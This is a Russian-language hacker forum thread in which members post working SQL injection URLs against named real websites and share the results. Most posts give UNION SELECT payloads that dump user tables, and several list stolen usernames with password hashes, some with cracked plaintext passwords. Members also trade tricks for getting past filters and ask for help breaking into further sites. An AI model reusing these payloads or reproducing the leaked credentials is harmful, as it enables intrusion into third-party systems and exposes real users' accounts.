SQL Инъекции

Discussion in 'Уязвимости' started by m0nzt3r, 4 Jul 2006.

Thread Status:
Not open for further replies.
  1. V.I.P

    V.I.P Elder - Старейшина

    Joined:
    6 Apr 2007
    Messages:
    69
    Likes Received:
    45
    Reputations:
    -6
    HTML:
    http://www.nerdtests.com/pics.php?id=-64+union+select+1,2,3,concat_ws(char(5 8),user,password),5,6,7+from+mysql.user+limit+6,1--
     
  2. VampiRUS

    VampiRUS Elder - Старейшина

    Joined:
    31 Dec 2005
    Messages:
    210
    Likes Received:
    105
    Reputations:
    57
    Code:
    http://www.ahfx.net/weblog.php?article=-1+union+select+1,AES_DECRYPT(AES_ENCRYPT(table_name,0x71),0x71),3,4,5,6,7,8,9,0,1,2,3,4+from+information_schema.tables+limit+18,1/*
    
     
    1 person likes this.
  3. KPOT_f!nd

    KPOT_f!nd положенец общага

    Joined:
    25 Aug 2006
    Messages:
    1,074
    Likes Received:
    502
    Reputations:
    65
    Code:
    http://www.ontario-tut.ru/prihoj_big.php?id=-8+union+select+1,2,user(),concat(database(),char(58),version()),5,6,7,8,9,10,11,12,13/*
    Code:
    http://ww.trizway.com/show.php?id=-41+union+select+1,email,3,4,5,6,7,8,9,10,11,12,13,14,15+from+subscriber/*&pg=2
    author
    news
     
  4. Серенький

    Joined:
    13 Apr 2007
    Messages:
    112
    Likes Received:
    145
    Reputations:
    83
    sql-inj

    Сайт: http://www.botans.ru
    уязвимость: http://www.botans.ru/study.php?groupid=2'
    подобранные таблицы: users
    подобранные поля: username,pass,email,id
    193 организмa
     
  5. Серенький

    Joined:
    13 Apr 2007
    Messages:
    112
    Likes Received:
    145
    Reputations:
    83
    sql-continued

    нашел users : login,password,email,id
    marina:ce5225d01c39d2567bc229501d9e610d (pass:marina)
    но практической пользы никакой - есть админка (http://fitnessmanager.ru/admin), но там другие данные.
     
    2 people like this.
  6. XTErner

    XTErner Elder - Старейшина

    Joined:
    13 Mar 2007
    Messages:
    109
    Likes Received:
    135
    Reputations:
    40
    Code:
    http://zvisti.com.ua/info.php?id=-421%20UNION%20SELECT%201,2,3,4,5,table_name,7,8,9,10,11,12+from+INFORMATION_SCHEMA.TABLES+limit+15,1/*
    Code:
    http://sodruzestvo.com/news/news.php?nid=-3+union+select+1,user(),3/*
    =\
     
    3 people like this.
  7. n1†R0x

    n1†R0x Elder - Старейшина

    Joined:
    20 Jan 2007
    Messages:
    728
    Likes Received:
    376
    Reputations:
    235
    бильярдец)
    propool.ru
    Code:
    http://www.propool.ru/news.php?id=-1+union+select+1,2,3,4,concat(username,0x3a,user_password),6,7,8,9,10,11+from+bb_users+limit+1,1/*
    Vladimir:9497a5313079f955e60747fed4639ae6:piraxy
    админка защищена .htaccess'ом... =\
     
    1 person likes this.
  8. zl0ba

    zl0ba ПсихолоГ

    Joined:
    10 Oct 2006
    Messages:
    393
    Likes Received:
    301
    Reputations:
    52
    Вот решил Эстонию пощупать :

    www.leisivald.ee

    Code:
    http://www.leisivald.ee/index.php?b=-45+union+select+concat(login,char(58),password),2+from+users/*
    aina:462b87e9b978289beae59ff7ed7f4799
    kaius:c2ea7f63c808abc0cf77b59226f3775b
     
    5 people like this.
  9. -=lebed=-

    -=lebed=- хэшкрякер

    Joined:
    21 Jun 2006
    Messages:
    3,804
    Likes Received:
    1,960
    Reputations:
    594
    Help sql-inj: www.autoteatr.ru
    Code:
    http://www.autoteatr.ru/catalog.php?subid=114
    http://www.autoteatr.ru/catalog.php?subid=115-1
    http://www.autoteatr.ru/catalog.php?subid=114'
    
    Дошёл до 40 колонок (скока же их там?) - не получается составить правильный запрос к БД.
     
  10. InferNo23

    InferNo23 Elder - Старейшина

    Joined:
    5 Sep 2006
    Messages:
    183
    Likes Received:
    126
    Reputations:
    42
    http://www.autoteatr.ru/catalog.php?subid=-1+union+select+concat(convert(username+using+cp1251),0x3a,convert(user_password+using+cp1251))+from+phpbb_users+limit+1,2/*

    Mixa:runner
     
    2 people like this.
  11. -=lebed=-

    -=lebed=- хэшкрякер

    Joined:
    21 Jun 2006
    Messages:
    3,804
    Likes Received:
    1,960
    Reputations:
    594
    Code:
    http://www.alexavto.ru/catalog.php?id=-123+union+select+1,version(),3,4,5,user(),7,8,9,10,11,12,13/*
    
     
  12. Серенький

    Joined:
    13 Apr 2007
    Messages:
    112
    Likes Received:
    145
    Reputations:
    83
    cont

    lebed
    нашел там news,products,user_list
     
    1 person likes this.
  13. -=lebed=-

    -=lebed=- хэшкрякер

    Joined:
    21 Jun 2006
    Messages:
    3,804
    Likes Received:
    1,960
    Reputations:
    594
    Обход фильтрации через AES_DECRYPT(AES_ENCRYPT())
    Code:
    _http://hcc.cc.gatech.edu/taxonomy/cat.php?cat=-111+union+select+version()/* - так облом, а вот так:
    _http://hcc.cc.gatech.edu/taxonomy/cat.php?cat=-111+union+select+AES_DECRYPT(AES_ENCRYPT(version(),0x71),0x71)/* - нет облома  ;) 
    
     
    2 people like this.
  14. n1†R0x

    n1†R0x Elder - Старейшина

    Joined:
    20 Jan 2007
    Messages:
    728
    Likes Received:
    376
    Reputations:
    235
    какая еще фильтрация? :D просто кодировки не сочетаются.
    нужно просто convert(version()+using+latin1)/*
    Code:
    http://hcc.cc.gatech.edu/taxonomy/cat.php?cat=-111+union+select+convert(version()+using+latin1)/*
    //с кем не бывает.. :)
     
    #2094 n1†R0x, 30 Apr 2007
    Last edited: 30 Apr 2007
    3 people like this.
  15. _Pantera_

    _Pantera_ Характерне козацтво

    Joined:
    6 Oct 2006
    Messages:
    186
    Likes Received:
    356
    Reputations:
    109
    Уральский Государственный Экономический университет

    http://www.usue.ru/general/professors/?id=-1+union+select+1,2,user_icq,4,5,6,7,8,9,10,11,12,13,14,15,16,17,concat(username,char(58),user_password)+from+www.phpbb_users+limit+1,1/*

    slava:a6ad04d2d6f6d7cf072f27e46be45326

    Всего зарегистрированных пользователей: 1368
     
    6 people like this.
  16. cRiLaZ

    cRiLaZ Member

    Joined:
    17 Oct 2006
    Messages:
    21
    Likes Received:
    15
    Reputations:
    18
    http://news.ntv.ru/news/NewsPrint.jsp?nid=102499+order+by+56--

    если кто дальше продолбит скиньте сюда или в личку плиз )
     
  17. Серенький

    Joined:
    13 Apr 2007
    Messages:
    112
    Likes Received:
    145
    Reputations:
    83
    sql-inj

    КВН - 1я украинская лига
    Сайт: http://kvn.odessa.ua
    уязвимость: http://kvn.odessa.ua/gallery.php?action=view&cat=11'
    подобранные таблицы: userlist
    подобранные поля: name,pass
    2 организмa (админы сайта)

    endorfine:6bdd7328ba8d625d540a4203311f5ec5
    dimon:77963b7a931377ad4ab5ad6a9cd718aa:ddd
    админка :
     
    1 person likes this.
  18. Hawkins

    Hawkins Elder - Старейшина

    Joined:
    24 Jan 2007
    Messages:
    60
    Likes Received:
    31
    Reputations:
    5
    http://www.logo.artperm.ru/script.php?litera=4'
    В скуле не силён : )
     
  19. }{0TT@БЬ)Ч

    }{0TT@БЬ)Ч Elder - Старейшина

    Joined:
    20 Jan 2006
    Messages:
    269
    Likes Received:
    140
    Reputations:
    31
    дальше сам уже ;)
    Code:
    http://www.logo.artperm.ru/script.php?litera=4'+union+select+1,2,version(),4,5,6,7,8/*
     
    4 people like this.
  20. Серенький

    Joined:
    13 Apr 2007
    Messages:
    112
    Likes Received:
    145
    Reputations:
    83
    sql-inj

    Информационное агенство
    Сайт: http://www.7info.ru
    уязвимость: http://www.7info.ru/index.php?ns=127&id=61'
    подобранные таблицы: user
    подобранные поля: login,password,name
    12 организмов
    Admin:b842f0802c987156629ea4c87cca1259
    Админку не обнаружил.
     
    1 person likes this.
Thread Status:
Not open for further replies.